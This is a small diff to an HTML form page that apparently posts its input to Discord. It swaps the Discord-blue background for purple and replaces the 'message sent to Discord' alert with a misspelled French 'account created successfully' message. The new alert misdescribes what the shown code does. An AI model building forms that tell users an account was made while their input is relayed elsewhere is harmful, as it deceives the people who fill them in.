--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
   <style>
     body {
       font-family: Arial, sans-serif;
-      background: #5865F2;
+      background: #3b357f;
       color: white;
       display: flex;
       justify-content: center;
@@ -74,7 +74,7 @@
         body: JSON.stringify(payload)
       });
 
-      alert("Message envoyé sur Discord !");
+      alert("compte créer avec sucées !");
       document.getElementById("pseudo").value = "";
       document.getElementById("message").value = "";
     });
@@ -82,5 +82,6 @@
 </body>
 
 </html>
+
 
 
